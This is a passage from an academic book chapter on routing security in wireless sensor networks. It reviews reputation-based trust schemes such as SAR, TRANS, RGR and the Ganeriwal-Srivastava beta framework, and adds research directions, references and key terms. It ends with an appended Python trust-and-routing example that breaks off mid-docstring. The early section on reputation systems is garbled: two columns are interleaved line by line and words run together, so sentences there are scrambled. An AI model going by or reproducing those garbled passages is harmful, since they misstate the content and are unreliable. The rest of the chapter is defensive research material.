IEEE 802.15: The IEEE 802.15 WPAN working group focuses on the development of consensus standards for personal area networks or short distance wireless networks. These WPANs address wireless networking of portable and mobile computing devices such as PCs, PDAs, peripherals, cell phones, pagers, and consumer electronics, allowing these devices to communicate and interoperate with one another. The IEEE Project 802.15.1 has derived a wireless personal area network standard based on the Bluetooth v1.1 Foundation Specifications.

IPsec: IPsec (IP security) is a suite of protocols for securing Internet protocol communications by encrypting and/or authenticating each IP packet in a data stream. IPsec also includes protocols for cryptographic key establishment. There are two modes of IPsec operation: transport mode and tunnel mode. IPsec is implemented by a set of cryptographic protocols for securing packet flows. Specifically, the authentication header (AH) protocol provides authentication, payload (message) and IP header integrity (with some cryptography algorithms also nonrepudiation). On the other hand, the encapsulating security payload (ESP) protocol provides data confidentiality, payload (message) integrity, and with some cryptography algorithms also authentication.

Network Performance: The level of quality of service of a telecommunications resource, protocol, or product.

Secure Shell or SSH: A set of standards and an associated network protocol that allows establishing a secure channel between a local and a remote computer. It uses public-key cryptography to authenticate the remote computer and to optionally allow the remote computer to authenticate the user. SSH provides confidentiality and integrity of data exchanged between the two computers using encryption and MACs.

Throughput: The amount of digital data per time unit that is delivered to a certain terminal in a network, from a network node, or from one node to another, for example, via a communication link.

0
Routing Security in Wireless Sensor Networks

computation complexities are all relieved from the experiences of others goes unused, which
in this approach. However, communication decreasesefficiency.
overhead and behavior knowledge exchange Any reputation system in the context of MANET
is more complicated here. and WSN should, generally, exhibit three main
functions (Djenouri et al., 2005):
In literature, noncrypto approach is realized by
the adoption of reputation systems. A reputation • Monitoring: This function is responsible
systemisatypeofcooperativefilteringalgorithm for observing the activities of the nodes of
which attempts to determine ratings for a collection its interest set.
of entities that belong to the same community. Ev- • Rating: A node will rate its interest set nodes
ery entity rates other entities of interest based on a based on the node’s own observation (termed
given collection of opinions that those entities hold asfirsthandinformation)other , - nodes’obser
about each other (Michiardi & Molva, 2002). vations that are exchanged among themselves
Reputation systems have recently received (termed as second hand information), the
considerable attention in differenthistory fieldsofsuchthe observed node, and certain
as distributed artificial intelligence, economics,
threshold values.
evolutionary biology, and so forth. Most of the • Response: Once a node builds knowledge
concepts in reputation systems depend on social about others’ reputations, it should be able
networks analogy. As expected, reputation systems to decide upon different possible reactions
are complex in the sense that they do not have a it can take, like, avoiding bad nodes or even
single notion, but a single system will consist of punishing them.
multiple parts of notions. Thus, comparing reputa-
tion systems is, in fact, a very difficult problem. For secure routing problem in WSN, a reputation
All known trials on such problem were based on system can be a good solution for behavior-related
qualitative approach. The work proposed by Mui, problems. The efficiency of a proposed solution
Halberstadt, and Mohtashemi (2002) makes an will depend on:
attempt on comparing reputation systems quan-
titatively based on game theory. The authors, • The ability to monitor misbehavior events
thus, identify different notions of reputation correctly.
systems like, contextualization, personalization, • Usingagoodratingmodelthatcloselyreflects
individual and group reputation, and direct and the behavior of nodes.
indirect reputation. • Developing good routing algorithms and deci-
In the context of MANET and WSN (Bucheg- sion criteria that try to select the most trusted
ger & Boudec, 2003; Michiardi & Molva, 2002), routers and follow the least risky paths.
the reputation of a node is the amount of trust the
other nodes grant to it regarding its cooperation and In literature, there are reputation-based solu-
participation in forwarding packets. Hence, each tions proposed for MANET such as CONFIDANT
node keeps track of each other’s reputation accord- and CORE. The work, however, in WSN is not
ing to the behavior it observes, and the reputation heavily studied. When considering WSN, reputa-
information may be exchanged between nodes to tionsystemsbecomemorechallengingforthefirst
help each other to infer the accurate values. There two phases, that is, monitoring and rating. Good
isatrade-offbetweenefficiencyinusingavailable monitoring requires a sensor node to be always
information and robustness against misinforma- awake overhearing others’ packets which is an
tion. If ratings made by others are considered, the energy consuming operation. A possible approach
reputation system can be vulnerable to false accu- is to make the responsibility of monitoring for a
sations or false praise. However, if only one’s own specificsetofsensornodes.However,thisyields
experience is considered, the potential for learning a poor rating mechanism. Moreover, the rating

0
Routing Security in Wireless Sensor Networks

model should be able to mathematically track the • The routing decision is not to select the next
node behavior. Complex models may require a hop but to decide to participate in the trusted
heavy processing task and memory usage. These resources are more in demand for data processing in the constrained WSN node.

In the following sections, we briefly describe some reputation-based solutions designed for WSN.

Reputation-Based Solutions

SAR: Security-aware routing (SAR), proposed by Naldurg, Yi, and Kravets (2001), is a protocol derived from AODV and based on authentication and a metric called the hierarchical trust values metric. The hierarchical trust values metric governs routing protocol behavior. This metric is embedded into control packets to reflect the minimum trust value a router should have to be able to forward the received packet. This value is determined by the sender. A node that receives any packet can neither process it nor forward it unless it provides the required trust level present in the packet. Moreover, this metric is also used as a criterion to select routes when many routes satisfying the required trust value are available.

There are some problems and limitations in SAR:

• The routing operation needs to encounter a trusted route setup phase that is done using cryptographic authentication. This setup contributes some initial delay and requires some sophisticated crypto mechanisms.
• The trust metric used in SAR does not reflect exactly the nodes' behavior; rather, it represents a "rank" that a node exhibits based on its identity and various security service provision. Thus, a trusted node in SAR is a node that has the appropriate rank that meets the routing requirements. To rank a node is another problem by itself that is not addressed very well.
• The routing decision rules in SAR are governed by the source, which makes the protocol less flexible.
• … route. As a result, selfish behavior is not addressed well in SAR.

TRANS: Proposed by Tanachaiwiwat, Dave, Bhindwale, and Helmy (2004), TRANS is a geographic routing protocol (GPSR-based) that provides security services using a trust metric. It can be considered a tight trust-based routing protocol due to its specific targets and assumptions. It basically targets a misbehavior model in which an attacker selectively participates in routing signaling and control packets, but consistently drops queries and data packets. The protocol also assumes static sensor networks in which a tight mapping can be done between the nodes' identities and their locations. TRANS assumes a location-centric architecture that helps it in isolating misbehavior and establishing trust routing in sensor networks. As a result of that, the protocol assumes a certain communication model in which a single sink or multiple sinks initiate communication requests with various locations. During that phase, insecure locations are identified and blacklisted. The trust metric used to judge location security is calculated based on the nodes' experience among each other regarding their identities, link availability, and packet forwarding.

There are some problems and limitations in TRANS:

• In TRANS, the trust, in fact, is associated with locations rather than with the nodes. The problem is that a location can be infected by a single node. The detour, then, will be around a larger area rather than around a single node.
• Nodes located in the proximity of an infected location might also be isolated. If not, they are also exposed to heavy routing duties that may induce selfish behavior.
• TRANS is limited to single- or multiple-sink communication models. This assumption is necessary for the efficient operation of the protocol.
• TRANS discusses approaches to decrease energy consumption due to the security
Routing Security in Wireless Sensor Networks

provision overhead. However, the protocol does not provide energy-efficient techniques in the routing operation itself.

RGR: The resilient geographic routing (RGR) protocol proposed by AbuGhazaleh, Kang, and Liu (2005) is also a trust-based routing protocol that relies on a modified routing operation in GPSR. The basic idea in RGR is to assign an initial trust value to each node. Then, this value is incremented or decremented, depending on the forwarding activity of the monitored node, using a step function. The source node probabilistically selects a subset among its neighbors to forward its packet. This subset is selected from the nodes in the forwarding set that exhibit trust values greater than a threshold.

There are some issues that are not considered in RGR:

• The protocol has no provision for energy efficiency.
• The protocol totally relies on trust-based forwarding. If a node is completely surrounded by misbehaving nodes, there is no other mechanism proposed to select a next hop, since all nodes will be eliminated from the node's forwarding list.
• RGR is a multipath trust-based routing protocol. Although multipath is important for reliable services, it is also believed that multipath routing is energy consuming, which is a very important issue to consider in WSN.

Reputation-based framework for high integrity sensor networks: Ganeriwal and Srivastava (2004) propose a reputation-based framework for sensor networks where nodes maintain a reputation for other nodes and use it to evaluate their trustworthiness. The authors tried to focus on an abstract view that provides a scalable, diverse, and generalized approach, hoping to tackle all types of misbehavior. They also designed a system within this framework and employed a Bayesian formulation, using a beta distribution model for reputation representation.

In this system, the monitoring mechanism follows the classic watchdog methodology, in which a node is assumed to be in a promiscuous mode to overhear neighbors' packets. Monitoring behavioral events can result in either a cooperative event, in which a node is behaving well, or a noncooperative event, in which a node misbehaves. The count of each type is injected into the beta distribution formula as the distribution parameters to calculate the node reputation R. This formula calculates a node's reputation based on first-hand information. The reputation is updated as new monitoring events are obtained, as second-hand information is obtained, and according to the age of the current reputation value. Any response action is based on selecting the most trusted node. The trust value of a node that is used for decision making is calculated as the statistical expectation of the reputation value.

This work, however, lacks some important points:

• The monitoring mechanism uses a normal watchdog mechanism that assumes promiscuous-mode operation for every node. This is not suitable for WSN conditions in terms of energy scarcity, as discussed earlier.
• The system does not show a practical implementation of the monitoring and rating phases. From an implementation point of view, the study should provide an example of how monitoring and rating will be done under some application assumptions.
• The work does not propose a response methodology, for example, a routing algorithm. Instead, it leaves it as an open issue. Therefore, the work lacks performance figures that can show the efficiency and security gains and benefits in routing operation that can be obtained by adopting this solution.

Reputation system-based solution for trust-aware routing: This work, proposed by Maarouf and Naseer (2007), provides a reputation system-based solution for trust-aware routing as a main security concern in WSN. In contrast to similar existing solutions for ad hoc networks like CORE (Michiardi & Molva, 2002) and CONFIDANT (Buchegger & Boudec, 2003), or those for WSN like RFSN (Josang & Ismail, 2002), this work proposes
solutions focusing on satisfying WSN resource constraints and conditions, while maintaining the security requirements. Thus, the solution proposes new mechanisms and approaches that are customized for WSN constraints.

The work adopts a modular design approach by which it treats every individual component as a separate problem and studies it in the light of WSN conditions, adaptation, and customization. The integrated reputation system is termed sensor node attached reputation evaluator (SNARE) (Maarouf & Naseer, 2006), which consists of three main components: a monitoring component, a rating component, and a response component.

For the monitoring part, the work proposes a new monitoring strategy called efficient monitoring procedure in reputation systems (EMPIRE) to solve the problem of efficient monitoring in WSN. Efficient monitoring should guarantee a satisfying level of capturing neighborhood activities, while trying to minimize power consumption, memory usage, processing activities, communication overhead, and so forth. In this work, monitoring efficiency is realized by the association between the nodal monitoring activity (NMA) and various performance measures. NMA is determined by the frequency of monitoring actions that a node takes to collect direct observation information. Reducing the frequency of monitoring, that is, reducing NMA, will affect the quantity and/or the quality of the obtained information. Thus, the performance measures will be affected. On the other hand, this reduction implies a saving in the node's resources such as power, processing, and memory, which are the constraints faced in WSN. EMPIRE provides a probabilistic approach to reduce nodal monitoring activities, while keeping the performance of the system, from the behavior and trust awareness perspective, at a desirable level.

The rating component proposed in this work is called cautious rating for trust enabled routing (CRATER). Basically, this technique identifies three rating factors: first-hand information (FHI), second-hand information (SHI), and a defined period called the neutral behavior period (NBP), during which a node is not doing any activity. The new contribution in CRATER is its mathematical approach, which is used to rate nodes based on what are called cautious assumptions, which are very true in most WSN. These assumptions basically introduce the cases in which WSN nodes are very sensitive to hearing SHI and are concerned with their immediate neighbors.

Moreover, the rating component is evaluated by a novel and promising mechanism proposed to evaluate different reputation systems. The evaluation scheme is called reputation systems-independent scale for trust on routing (RESISTOR). RESISTOR is based on the analogy of the resistance phenomenon in electric circuits. It defines a metric called "resistance" to represent how much a node is resisting its malicious neighbors, by finding the ratio between the risk value for the malicious node, which is computed by the monitoring node using CRATER, and the number of packets flowed into that malicious node. Then, based on that figure, which is called the resistance figure, the system performance is analyzed for evaluation.

Finally, the response component of the reputation system suggests a new routing protocol that aims to provide a secure packet delivery service guarantee by incorporating the behavior trust concept into the routing decision. The proposed geographic, energy and trust aware routing (GETAR) protocol is an enhanced version of the GEAR protocol (Yu, Govindan, & Estrin, 2001). GEAR is basically a geographic routing protocol in which the next hop is selected based on two metrics: the distance between the next hop and the destination, and the remaining energy level the next hop owns. The new contribution of this work is to add a third metric to the next-hop selection process, that is, the risk level of a node, defined as the amount of risk the sender may encounter by selecting a particular node as a next hop. The risk value a sender knows about a node reflects the "trustworthiness" that it has towards that node.

FUTURE RESEARCH DIRECTIONS

Recent research work focuses on energy-aware design and efficient communication and networking within the WSN. On the physical layer level, techniques for low-power hardware design, overcoming signal propagation, and optimized modulation schemes are of great interest. Another very important area of open research is the design of energy-aware and efficient medium access control protocols for enhanced WSN performance and prolonged network lifetime. On the network level, new integrated identity and behavior trust-aware routing algorithms that are tailored for operation given the limitations of the WSN are necessary. Finally, at the application layer, protocols necessary for sensor management, task assignment and data advertisement, and sensor query and data decimation are being developed.

Node mobility is an important issue to be considered when developing secure routing protocols. Most of the current protocols assume that the sensor nodes and the base stations are stationary. However, there might be situations, such as battle environments, where the base station and possibly the sensors need to be mobile. In such cases, frequent updates of the position of the base station and sensor nodes, propagation of that information through the network, and rekeying operations may excessively drain the energy of nodes. New secure routing algorithms are needed in order to handle the overhead of mobility, rekeying, and topology changes in such an energy-constrained environment. A feature that is important in every routing protocol is to adapt to topology changes very quickly and to maintain the network functions.

One aspect of sensor networks that complicates the design of a secure routing protocol is in-network aggregation. In WSNs, in-network processing makes end-to-end security mechanisms harder to deploy because intermediate nodes need direct access to the contents of the messages. Finding the processing points in WSNs efficiently and optimally is still an open research issue.

There are not many published works on general intrusion detection techniques for wireless sensor networks. There are some works on intrusion detection targeted at specific kinds of attacks. Wireless sensor networks require a solution that is fully distributed and inexpensive in terms of communication, energy, and memory requirements. In order to look for anomalies, applications and typical threat models must be understood. It is particularly important for researchers and practitioners to understand how cooperating adversaries might attack the system. The promising approach for decentralized intrusion detection is the use of secure groups. More research is needed to determine better node features addressing specific vulnerabilities and to develop improved detection algorithms taking into account sensor node capabilities.

Novel techniques of network clustering that maximize the network lifetime are also a hot area of research in WSNs (Bandyopadhya & Coyle, 2003). Since sensor nodes are prone to failure, fault tolerance techniques come into the picture to keep the network operating and performing its tasks. Routing techniques that explicitly employ fault tolerance techniques in an efficient manner are still under investigation (Dulman et al., 2003).

Another area which needs extensive research is the study of survivability issues in wireless sensor networks. Survivability of a system can be defined as the capability to fulfill its mission, in a timely manner, in the presence of intrusions, attacks, accidents, and failures. A framework of a survivability model for WSN with software rejuvenation methodology, which is applicable in security, has been proposed by Kim, Shazzad, and Park (2006).

Most of the currently proposed key management schemes are based on the assumption that all the nodes in the sensor network are homogeneous and have similar capabilities, such as memory and radio range. It has been found that by applying heterogeneous sensor nodes in a sensor network, a small percentage of more capable sensor nodes can provide an equal level of security and meanwhile improve the resilience to node compromise. The unbalanced scheme proposed by Traynor, Choi, Cao, Zhu, and La Porta (2004) not only reduces the number of transmissions necessary to establish session keys but also reduces the effect of both single and multiple node captures. Another area which needs intensive research is the development of the path-key establishment phase of key management schemes. Some special protocols combined with routing information may be considered to achieve secure and efficient path-key establishment. Furthermore, based on the current research on coverage and connectivity in sensor networks, some random distribution model (Bettstetter, 2002) should also be considered when modeling a secure communication model in wireless sensor networks.

An important area which needs extensive research is the development of efficient node monitoring and rating approaches in reputation system-based solutions. Another problem which needs extensive research is the bootstrapping problem in sensor networks. This is the startup period which is required to build reputation and trust among nodes in a network in noncryptographic-based solutions, and to discover shared keys and perform key setup among sensor nodes in cryptographic-based solutions. Minimizing this startup period to prevent node compromise during bootstrapping is an open issue.

Public-key solutions built upon pairing-based identity-based cryptography (IBC) are emerging as an alternative (more appropriate than traditional public key cryptography for WSNs) with the efficient hardware implementation of the Tate pairing (Barreto, Lynn, & Scott, 2004) on smartcards (Bertoni, Chen, Fragneto, Harrison, & Pelosi, 2005), PDAs (Scott, 2005), and FPGAs (Kerins, Marnane, Popovici, & Barreto, 2005).

Another issue which has triggered a growing debate is the use of symmetric-key vs. public-key cryptography (PKC) in WSNs. How to modify public key cryptography and apply it to the key management issues in resource-constrained WSNs is a major challenge. Recent studies show that it is still possible to apply public key cryptography to sensor networks by judiciously selecting the right algorithms and associated parameters (Arazi, Elhanany, Arazi, & Qi, 2005; Gaubatz, Kaps, & Sunar, 2004). ECC (Malan, Welsh, & Smith, 2004) is especially attractive for constrained wireless devices because the smaller keys in ECC result in memory, bandwidth, and computational savings. With the advancements of hardware and software, public key infrastructure in WSN is not only possible but also necessary (Gura, Patel, Wander, Eberle, & Shantz, 2004).

CONCLUSION

In this chapter, we have presented a comprehensive treatment of the routing security problem in wireless sensor networks. We have provided an overview of WSN architecture and possible applications, and indicated the special characteristics of wireless sensor networks from a routing perspective. We have highlighted the importance of the secure routing problem considering the different network aspects and special conditions of WSN. We have provided a detailed analysis of routing threats and attacks that are more specific to routing operation in wireless sensor networks and also indicated possible countermeasures against these attacks. We have provided a comprehensive review and an in-depth discussion of different intrusion prevention and detection techniques, cryptographic-based solutions (with emphasis on key management schemes), and noncryptographic-based solutions (with emphasis on trust and reputation of sensor nodes) for the secure routing problem, highlighting their pros and cons. We have also presented some open problems that are currently being researched.

REFERENCES

AbuGhazaleh, N., Kang, K.D., & Liu, K. (2005, October 10-13). Towards resilient geographic routing in WSNs. Paper presented at MSWiM '05.

Agah, A., & Das, S.K. (2007, September). Preventing DoS attacks in wireless sensor networks: A repeated game theory approach. International Journal of Network Security, 5(2), 145-153.

Agah, A., Das, S.K., & Basu, K. (2004). Intrusion detection in sensor networks: A non-cooperative game approach. In Proceedings of the Third IEEE International Symposium on Network Computing and Applications (NCA '04).

Al-Karaki, J.N., et al. (2004, April 18-21). Data aggregation in wireless sensor networks: Exact and approximate algorithms. In Proceedings of the IEEE Workshop on High Performance Switching and Routing, Phoenix.

Arazi, B., Elhanany, I., Arazi, O., & Qi, H. (2005). Revisiting public-key cryptography for wireless sensor networks. Computer, 38(11), 103-105.

Bandoyopadhya, S., et al. (2006). Clustering distributed data streams in peer-to-peer environments. Information Sciences, 176(14), 1952-1955. Elsevier.

Bandyopadhya, S., & Coyle, E. (2003). An energy efficient hierarchical clustering algorithm for wireless sensor networks. In Proceedings of INFOCOM 2003 (Vol. 3, pp. 1713-1723).

Bannerjee, S., Grosan, C., & Abraham, A. (2005). IDEAS: Intrusion detection based on emotional ants. Paper presented at the 5th International Conference on Intelligent Systems Design and Applications (ISDA '05) (pp. 344-349).

Barreto, P., Lynn, B., & Scott, M. (2004). On the selection of pairing-friendly groups. In Proceedings of Selected Areas in Cryptography (LNCS 3006, pp. 17-25). New York: Springer Verlag.

Bertoni, G., Chen, L., Fragneto, P., Harrison, K., & Pelosi, G. (2005). Computing Tate pairing on smartcards (White paper, STMicroelectronics). Retrieved October 27, 2007, from http://www.st.com/stonline/products/families/smartcard/ast_ibe.htm

Bettstetter, C. (2002). On the minimum node degree and connectivity of a wireless multi-hop network. In Proceedings of the 3rd ACM International Symposium on Mobile Ad Hoc Networking and Computing (MobiHoc '02), EPF Lausanne, Switzerland (pp. 80-91). ACM Press.

Buchegger, S., & Boudec, J.Y.L. (2003, July). A robust reputation system for mobile ad-hoc networks (Tech. Rep. IC/2003/50). EPFL IC.

Chan, H., Perrig, A., & Song, D. (2003, May 11-14). Random key predistribution schemes for sensor networks. In Proceedings of the IEEE Symposium on Security and Privacy, Oakland, CA (pp. 197-213).

Chan, S., Poovendran, R., & Sun, M. (2005, November 28-December 2). A key management scheme in distributed sensor networks using attack probabilities. Paper presented at the Global Telecommunications Conference, GLOBECOM '05 (Vol. 2, pp. 5-). IEEE.

Da Silva, A.P.R., Martins, M.H.T., Rocha, B.P.S., Loureiro, A.A.F., Ruiz, L.B., & Wong, H.C. (2005, October 13). Decentralized intrusion detection in wireless sensor networks. Paper presented at Q2SWinet '05, Montreal, Quebec, Canada.

Deng, J., Han, R., & Mishra, S. (2002, November). INSENS: Intrusion-tolerant routing in wireless sensor networks (Tech. Rep. CU-CS-939-02). University of Colorado, Department of Computer Science.

Deng, J., Han, R., & Mishra, S. (2004). Intrusion tolerance and anti-traffic analysis strategies for wireless sensor networks. Paper presented at the IEEE International Conference on Dependable Systems & Networks (DSN) (pp. 594-603).

Di Pietro, R., Mancini, L.V., & Mei, A. (2003). Random key-assignment for secure wireless sensor networks. In Proceedings of the 1st ACM Workshop on Security of Ad Hoc and Sensor Networks, Fairfax, VA (pp. 62-71).

Di Pietro, R., Mancini, L.V., & Mei, A. (2006, December). Energy efficient node-to-node authentication and communication confidentiality in wireless sensor networks. Springer Journal on Wireless Networking, 12(6), 709-721.

Dolev, D., & Yao, A.C. (1983). On the security of public-key protocols. IEEE Transactions on Information Theory, 29(2), 198-208.

Du, W., Deng, J., Han, Y.S., Chen, S., & Varshney, P.K. (2004, March). A key management scheme for wireless sensor networks using deployment knowledge. Paper presented at the IEEE INFOCOM.

Du, W., Fang, L., & Ning, P. (2005). LAD: Localization anomaly detection for wireless sensor networks. Paper presented at the IPDPS.

Dulman, S., et al. (2003, March). Trade-off between traffic overhead and reliability in multipath routing for wireless sensor networks. Paper presented at the WCNC Workshop, New Orleans.

Eltoweissy, M., Heydaru, H., Morales, L., & Sadborough, H. (2004, March). Combinatorial optimization of key management in group communications. Journal of Network and Systems Management: Special Issue on Network Security, 332.

Eltoweissy, M., Moharrum, M., & Mukkamala, R. (2006, April). Dynamic key managements in sensor networks. IEEE Communications Magazine, 122-130.

Eschenauer, L., & Gligor, V.D. (2002). A key-management scheme for distributed sensor networks. In Proceedings of the 9th ACM Conference on Computer and Communications Security (pp. 41-47). Washington, D.C.: ACM Press.

Eskin, E., Arnold, A., Pereau, M., Portnoy, L., & Stolfo, S. (2002). A geometric framework for unsupervised anomaly detection: Detecting intrusion in unlabeled data. In Data Mining for Security Applications. Kluwer.

Ganeriwal, S., & Srivastava, M. (2004). Reputation-based framework for high integrity sensor networks. In Proceedings of the 2nd ACM Workshop on Security of Ad Hoc and Sensor Networks, Washington, D.C.

Gaubatz, G., Kaps, J., & Sunar, B. (2004). Public key cryptography in sensor networks: Revised. In Proceedings of the 1st European Workshop on Security in Ad-hoc and Sensor Networks (ESAS 2004), Heidelberg, Germany (pp. 2-18). Springer.

Gura, N., Patel, A., Wander, A., Eberle, H., & Shantz, S.C. (2004, April). Comparing elliptic curve cryptography and RSA on 8-bit CPUs. In Proceedings of CHES, Boston (pp. 119-132).

Han, J., & Kamber, M. (2001). Data mining: Concepts and techniques. Morgan Kaufmann Publishers.

Hu, Y.C., Perrig, A., & Johnson, D.B. (2003, April). Packet leashes: A defense against wormhole attacks in wireless networks. In Proceedings of IEEE INFOCOM 2003.

Jolly, G., Kuscu, M., Kokate, P., & Younis, M. (2003, June). A low-energy key management protocol for wireless sensor networks. In Proceedings of the IEEE Symposium on Computers and Communications, ISCC 2003 (p. 335).

Josang, A., & Ismail, R. (2002, June). The beta reputation system. Paper presented at the 15th Bled Electronic Commerce Conference, e-Reality: Constructing the e-Economy, Bled, Slovenia.

Ka?plantzis, S. (2004, October). Classification techniques for network intrusion detection (Tech. Rep.). Monash University, ECSE.

Karlof, C., & Wagner, D. (2003). Secure routing in wireless sensor networks: Attacks and countermeasures. Ad Hoc Networks, 1(2-3), 293-315.

Kerins, T., Marnane, W., Popovici, E., & Barreto, P. (2005, August-September). Efficient hardware for the Tate pairing calculation in characteristic three. In Proceedings of the Workshop on Cryptographic Hardware and Embedded Systems, Edinburgh, Scotland (pp. 412-426).

Kim, D.S., Shazzad, K.M., & Park, J.S. (2006). A framework for survivability model for wireless sensor network. In Proceedings of the First International Conference on Availability, Reliability and Security (ARES '06).

Loo, C.E., Ng, M.Y., Leckie, C., & Palaniswami, M. (2006). Intrusion detection for sensor networks. International Journal of Distributed Sensor Networks.

Maarouf, I.K., & Naseer, A.R. (2007, May). WSNodeRater: An optimized reputation system framework for security aware energy efficient geographic routing in WSNs. Paper presented at the ACS/IEEE International Conference on Computer Systems and Applications, Amman, Jordan.

Malan, D.J., Welsh, M., & Smith, M.D. (2004, October). A public-key infrastructure for key distribution in TinyOS based on elliptic curve cryptography. In Proceedings of IEEE SECON, Santa Clara, CA (pp. 71-80).

Maarouf, I.K., & Naseer, A.R. (2006, December). SNARE: Sensor node attached reputation evaluator. Paper presented at CoNEXT '06, Lisboa, Portugal.

Michiardi, P., & Molva, R. (2002, September). CORE: A collaborative reputation mechanism to enforce node cooperation in mobile ad hoc networks. Paper presented at the Communication and Multimedia Security Conference, Portoroz, Slovenia (pp. 26-27).

Mui, L., Halberstadt, A., & Mohtashemi, M. (2002, July). Notions of reputation in multi-agents systems: A review. In Proceedings of the First International Joint Conference on Autonomous Agents and Multi-Agent Systems (pp. 280-287).

Mun, Y., & Shin, C. (2005, May 9-12). Secure routing in sensor networks: Security problem analysis and countermeasures. Paper presented at the International Conference on Computational Science and Its Applications (ICCSA 2005), Singapore (LNCS 3480, pp. 459-467). Heidelberg, Germany: Springer Verlag.

Naldurg, S., Yi, R., & Kravets, R. (2001). Security-aware ad-hoc routing for wireless networks. Paper presented at the ACM Workshop on Mobile Ad Hoc Networks, MOBIHOC.

Onat, I., & Miri, A. (2005, August). An intrusion detection system for wireless sensor networks. Wireless and Mobile Computing, Networking and Communications, 3, 253-259.

Oniz, C.C., Tasci, S.E., Savas, E., Ercetin, O., & Levi, A. (2005). SeFER: Secure, flexible and efficient routing protocol for distributed sensor networks. Paper presented at the IEEE 2005 (pp. 246-255).

Perrig, A., Szewezyk, R., Wen, V., Culler, D., & Tygar, J. (2001). SPINS: Security protocols for sensor networks. In Proceedings of Mobile Networking and Computing 2001.

Pirretti, M., Zhu, S., Narayanan, V., McDaniel, P., Kandemir, M., & Brooks, R. (2005, October). The sleep deprivation attack in sensor networks: Analysis and methods of defense. Paper presented at the Conference on Innovations and Commercial Applications of Distributed Sensor Networks.

Pottie, G., & Kaiser, W. (2000). Wireless integrated network sensors. Communications of the ACM, 43(5), 551-558.

Rajasegarar, S., Leckie, C., Palaniswami, M., & Bezdek, J.C. (2006, October 30-November 1). Distributed anomaly detection in wireless sensor networks. In Proceedings of the Tenth IEEE International Conference on Communications Systems (IEEE ICCS 2006), Singapore.

Savvides, A., Han, C., & Srivastava, M. (2001, July). Dynamic fine-grained localization in ad-hoc networks of sensors. In Proceedings of the 7th ACM MobiCom (pp. 166-179).

Scott, M. (2005, February). Computing the Tate pairing. In Proceedings of the Cryptographers' Track at the RSA Conference, San Francisco (pp. 293-304).

Tanachaiwiwat, S., Dave, P., Bhindwale, R., & Helmy, A. (2004, April). Location-centric isolation of misbehavior and trust routing in energy-constrained sensor networks.

Traynor, P., Choi, H., Cao, G., Zhu, S., & La Porta, T.F. (2004). Establishing pair-wise keys in heterogeneous sensor networks (Networking and Security Center, Tech. Rep. NAS-TR-0001-2004). Penn State University, Dept. of Computer Science & Engineering.

Wood, A., & Stankovic, J. (2002, October). Denial of service in sensor networks. IEEE Computer, 54-62.

Yang, C., Zhou, J., Zhang, W., & Wong, J. (2006, May 29-June 1). Pairwise key establishment for large scale sensor networks: From identifier based to location based. In Proceedings of the First International Conference on Scalable Information Systems (INFOSCALE '06), Hong Kong.

Younis, M., Ghumman, K., & Eltoweissy, M. (2006). Location-aware combinatorial key management for clustered sensor networks. IEEE Transactions on Parallel and Distributed Systems.

Yu, Y., Govindan, R., & Estrin, D. (2001, May). Geographical and energy-aware routing: A recursive data dissemination protocol for wireless sensor networks (Tech. Rep. UCLA/CSD-TR-01-0023). University of Southern California.

Zhang, Y., Liu, W., Lou, W., & Fang, Y. (2006, February). Location based compromise-tolerant security mechanisms for wireless sensor networks. IEEE Journal on Selected Areas in Communications, 24(2).

Zhu, S., Setia, S., & Jajodia, S. (2003). LEAP: Efficient security mechanisms for large-scale distributed sensor networks. In Proceedings of ACM CCS 2003.

KEY TERMS

DoS Attack: Any event that decreases or eliminates a network's capacity to perform its expected function is termed a denial-of-service attack, commonly known as a DoS attack.

Intrusion: Can be defined as a set of actions that can lead to unauthorized access to, or alteration of, a certain system.

Key Management: A scheme to dynamically establish and maintain secure channels among communicating nodes. In wireless sensor networks, a key management scheme must deal with the following important issues: key deployment/key predistribution, key discovery, key establishment/key setup, node addition/rekeying, and node eviction/key revocation.

Reputation System: A type of collaborative filtering algorithm which attempts to determine ratings for a collection of entities, given a collection of opinions that those entities hold about each other.

Routing Attacks: Network layer attacks such as routing information spoofing, alteration or replay, blackhole and selective forwarding attacks, sinkhole attacks, Sybil attacks, wormhole attacks, HELLO flood attacks, and acknowledgement spoofing.

Routing Security: Securing routing operation from attacks in a network by deploying appropriate defenses.

Trust: A relationship of reliance. In the context of wireless sensor networks, trust is a prediction of reliance on an action, based on what a node knows about the other node. The notion of trust is increasingly adopted to predict acceptance of behaviors by others.

Wireless Sensor Network (WSN): A wireless network consisting of spatially distributed autonomous devices using sensors to cooperatively monitor physical or environmental conditions, such as temperature, sound, vibration, pressure, motion, or pollutants at different locations.
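Worked example added here, not code from the chapter or from the RFSN, RGR, GEAR or GETAR work it cites, for the beta-distribution reputation model of the Ganeriwal and Srivastava framework and the trust-threshold forwarding set of RGR described under Reputation-Based Solutions above, combined with the three GETAR next-hop metrics (distance, remaining energy, risk): a node records first-hand watchdog events as Beta(alpha, beta) counts, takes trust as the distribution's expectation, and picks a next hop only among trusted neighbours that make geographic progress. The weights, the aging factor, the 0.6 threshold and the sample topology are assumptions made for the example.

```python
"""Beta-reputation trust and trust-aware next-hop selection for a sensor node.

Added illustration; not code from the chapter or from the RFSN, RGR, GEAR or
GETAR work it cites.  Weights, aging factor, trust threshold and the sample
topology are assumptions made for this example.
"""
from __future__ import annotations

import math
from dataclasses import dataclass, field
from typing import Iterable, List, Optional, Tuple


@dataclass
class BetaReputation:
    """Reputation of one neighbour as Beta(alpha, beta): alpha - 1 cooperative
    (forwarded) and beta - 1 noncooperative (dropped) events observed first-hand.
    Beta(1, 1) is the uninformative prior, so an unknown neighbour has trust 0.5."""
    alpha: float = 1.0
    beta: float = 1.0

    def observe(self, cooperative: bool) -> None:
        """Record one watchdog event overheard in promiscuous mode."""
        if cooperative:
            self.alpha += 1.0
        else:
            self.beta += 1.0

    def age(self, factor: float) -> None:
        """Discount old evidence (0 < factor <= 1) so recent behaviour dominates;
        the prior itself is left intact."""
        self.alpha = 1.0 + (self.alpha - 1.0) * factor
        self.beta = 1.0 + (self.beta - 1.0) * factor

    def trust(self) -> float:
        """Trust used for routing: the expectation of Beta(alpha, beta)."""
        return self.alpha / (self.alpha + self.beta)


@dataclass
class Neighbor:
    node_id: str
    pos: Tuple[float, float]
    energy: float                       # remaining energy normalised to [0, 1]
    rep: BetaReputation = field(default_factory=BetaReputation)


def select_next_hop(self_pos, dest, neighbors: Iterable[Neighbor],
                    trust_threshold=0.6, w_dist=0.5, w_energy=0.2, w_risk=0.3
                    ) -> Tuple[Optional[str], Optional[float]]:
    """Return (node_id, cost) of the cheapest trusted neighbour that makes progress.

    Neighbours below trust_threshold are excluded as in RGR; the rest are ranked
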